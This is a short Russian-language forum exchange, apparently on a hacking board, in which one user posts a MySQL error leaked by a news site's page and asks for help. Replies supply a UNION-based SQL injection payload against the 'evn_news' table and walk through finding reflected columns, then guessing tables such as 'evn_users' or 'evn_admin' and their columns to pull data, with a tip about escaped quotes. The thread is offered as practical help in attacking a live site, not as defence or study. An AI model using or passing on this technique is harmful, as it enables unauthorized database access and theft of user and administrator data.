здарова всем, помогите составить запрос
MySQL couldn't execute this query - SELECT id, title, body, status, image, comment, position, DATE_FORMAT(time_insert,'%e.%m.%Y | %H:%i') as new_date FROM evn_news WHERE id = 3682\'

-1+union+select+1,2,3,4,5,6,7,8+from+evn_news/*

далее вместо 1-8 пытаешься подставить слово и ищешь его на страничке.
Если нашел... меняешь evn_news на скажем evn_users или evn_admin может evn_member, а дальше пытаешься угадать столбец

далее вместо 1-8 пытаешься подставить слово и ищешь его на страничке.
Можно просто по цифрам найти, что выводится. Для этого и нумеруют ;) И слово это надо в кавычки обязательно ставить, которые часто экранируются.